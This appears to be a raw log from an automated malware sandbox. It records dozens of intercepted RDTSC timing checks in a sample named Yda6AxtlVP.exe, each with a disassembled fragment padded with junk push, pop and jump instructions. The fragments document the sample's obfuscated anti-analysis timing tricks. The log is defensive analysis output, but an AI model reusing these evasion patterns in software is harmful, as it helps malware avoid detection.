Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16DC45B second address: 16DC477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9665249A01h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16DC477 second address: 16DC48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E4A70 second address: 16E4A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F96652499F6h 0x0000000a je 00007F96652499F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E4A80 second address: 16E4A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E35FB second address: 16E3603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E4795 second address: 16E47BC instructions: 0x00000000 rdtsc 0x00000002 je 00007F9665989DAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9665989DB3h 0x0000000f jns 00007F9665989DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E6109 second address: 16E6134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F9665249A05h 0x0000000c pushad 0x0000000d jmp 00007F96652499FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E6134 second address: 16E613A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E613A second address: 16E6156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c jl 00007F96652499F6h 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007F96652499F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 172C875 second address: 172C8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9665989DB6h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F9665989DB0h 0x00000016 popad 0x00000017 jmp 00007F9665989DAAh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jg 00007F9665989DA6h 0x00000027 jmp 00007F9665989DB0h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 172C8CD second address: 172C8D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 172B2DE second address: 172B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665989DB0h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b jmp 00007F9665989DB1h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F9665989DB8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 173CD40 second address: 173CD4A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F96652499F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 173CD4A second address: 173CD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 173CD50 second address: 173CD86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A09h 0x00000009 jmp 00007F9665249A09h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 173CD86 second address: 173CD8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 173CD8A second address: 173CDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96652499FBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 ja 00007F96652499F6h 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180AB48 second address: 180AB4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180AB4E second address: 180AB53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180AE62 second address: 180AE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180AE68 second address: 180AE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180AFF8 second address: 180B040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665989DB1h 0x00000008 jne 00007F9665989DA6h 0x0000000e popad 0x0000000f jns 00007F9665989DA8h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jo 00007F9665989DA6h 0x00000020 jne 00007F9665989DA6h 0x00000026 jno 00007F9665989DA6h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F9665989DABh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180B040 second address: 180B053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FDh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180B053 second address: 180B05C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180B744 second address: 180B763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F96652499FCh 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180B8EB second address: 180B8F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180B8F1 second address: 180B8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180B8FB second address: 180B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180D42E second address: 180D436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180D436 second address: 180D43D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 180FF7F second address: 180FF89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F96652499F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 181004C second address: 1810050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1810050 second address: 1810056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1810056 second address: 18100B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F9665989DA8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 add dword ptr [ebp+12B90152h], edi 0x0000002b push 00000004h 0x0000002d push edx 0x0000002e mov edx, dword ptr [ebp+12A01818h] 0x00000034 pop edx 0x00000035 jmp 00007F9665989DB4h 0x0000003a push F926B5A3h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 18100B1 second address: 18100B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 18100B7 second address: 18100BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 18100BC second address: 18100C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 181035F second address: 1810372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F9665989DA8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1810372 second address: 1810378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1810378 second address: 18103AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ebx 0x0000000d jnc 00007F9665989DACh 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edi 0x00000017 jbe 00007F9665989DACh 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 18138C8 second address: 18138CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74700CA second address: 7470101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov ebx, 6EF9038Ah 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9665989DB7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470101 second address: 747012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F96652499FDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747012E second address: 7470134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470134 second address: 7470138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470138 second address: 747018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007F9665989DAFh 0x00000010 xchg eax, esi 0x00000011 jmp 00007F9665989DB6h 0x00000016 push eax 0x00000017 jmp 00007F9665989DABh 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9665989DB5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747018D second address: 74701F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F96652499FDh 0x0000000b xor si, 9536h 0x00000010 jmp 00007F9665249A01h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [775606ECh] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov bx, DDBEh 0x00000026 pushfd 0x00000027 jmp 00007F96652499FFh 0x0000002c or al, 0000006Eh 0x0000002f jmp 00007F9665249A09h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74701F5 second address: 747021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9665989DADh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747021B second address: 74702E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F966524A7C4h 0x0000000f pushad 0x00000010 mov ecx, 79A0BC63h 0x00000015 mov dl, cl 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007F9665249A00h 0x0000001e mov dword ptr [esp], edi 0x00000021 jmp 00007F9665249A00h 0x00000026 call dword ptr [77530B60h] 0x0000002c mov eax, 756AE5E0h 0x00000031 ret 0x00000032 jmp 00007F9665249A00h 0x00000037 push 00000044h 0x00000039 jmp 00007F9665249A00h 0x0000003e pop edi 0x0000003f pushad 0x00000040 pushad 0x00000041 jmp 00007F96652499FCh 0x00000046 popad 0x00000047 mov edi, 48E10214h 0x0000004c popad 0x0000004d push esp 0x0000004e jmp 00007F9665249A08h 0x00000053 mov dword ptr [esp], edi 0x00000056 pushad 0x00000057 jmp 00007F96652499FEh 0x0000005c mov edi, esi 0x0000005e popad 0x0000005f push dword ptr [eax] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F9665249A03h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747038D second address: 7470391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470391 second address: 7470397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470397 second address: 747039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747039D second address: 74703A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74703A1 second address: 7470401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007F9665989DB5h 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 jmp 00007F9665989DAEh 0x00000018 mov dword ptr [esi+0Ch], eax 0x0000001b jmp 00007F9665989DB0h 0x00000020 mov eax, dword ptr [ebx+4Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9665989DB7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470401 second address: 747042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov bx, 379Ch 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747042B second address: 7470481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c jmp 00007F9665989DB0h 0x00000011 mov dword ptr [esi+14h], eax 0x00000014 pushad 0x00000015 mov dx, ax 0x00000018 movzx esi, di 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+54h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007F9665989DAEh 0x00000027 pop eax 0x00000028 call 00007F9665989DABh 0x0000002d pop ecx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470481 second address: 747049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A05h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747049A second address: 7470533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e jmp 00007F9665989DAEh 0x00000013 mov eax, dword ptr [ebx+58h] 0x00000016 pushad 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9665989DACh 0x0000001e add ch, 00000038h 0x00000021 jmp 00007F9665989DABh 0x00000026 popfd 0x00000027 popad 0x00000028 mov bx, 6E5Ah 0x0000002c popad 0x0000002d mov dword ptr [esi+1Ch], eax 0x00000030 jmp 00007F9665989DB1h 0x00000035 mov eax, dword ptr [ebx+5Ch] 0x00000038 pushad 0x00000039 call 00007F9665989DACh 0x0000003e movzx esi, dx 0x00000041 pop edx 0x00000042 mov dl, ah 0x00000044 popad 0x00000045 mov dword ptr [esi+20h], eax 0x00000048 pushad 0x00000049 mov eax, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F9665989DB7h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470533 second address: 7470573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+60h] 0x0000000d pushad 0x0000000e mov dx, ax 0x00000011 popad 0x00000012 mov dword ptr [esi+24h], eax 0x00000015 jmp 00007F96652499FFh 0x0000001a mov eax, dword ptr [ebx+64h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470573 second address: 7470577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470577 second address: 7470592 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470592 second address: 7470598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470598 second address: 74705DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e jmp 00007F9665249A06h 0x00000013 mov eax, dword ptr [ebx+68h] 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a mov edx, esi 0x0000001c popad 0x0000001d mov dword ptr [esi+2Ch], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F96652499FBh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74705DC second address: 7470601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov edx, 4D83C7C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [ebx+6Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9665989DAFh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470601 second address: 7470607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470607 second address: 747060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747060D second address: 7470611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470611 second address: 747066D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f jmp 00007F9665989DB0h 0x00000014 mov ax, word ptr [ebx+00000088h] 0x0000001b jmp 00007F9665989DB0h 0x00000020 mov word ptr [esi+32h], ax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9665989DB7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747066D second address: 7470673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470673 second address: 74706C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9665989DB4h 0x00000018 add cl, FFFFFFB8h 0x0000001b jmp 00007F9665989DABh 0x00000020 popfd 0x00000021 mov ch, 9Ah 0x00000023 popad 0x00000024 mov dword ptr [esi+34h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov ax, 3C83h 0x0000002e mov bx, cx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74706C0 second address: 74706FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F96652499FBh 0x00000009 jmp 00007F9665249A03h 0x0000000e popfd 0x0000000f mov bl, ah 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [ebx+18h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F96652499FEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 74706FB second address: 747072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F9665989DB6h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747072C second address: 7470730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 7470730 second address: 747074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 747074D second address: 747076B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 rdtsc
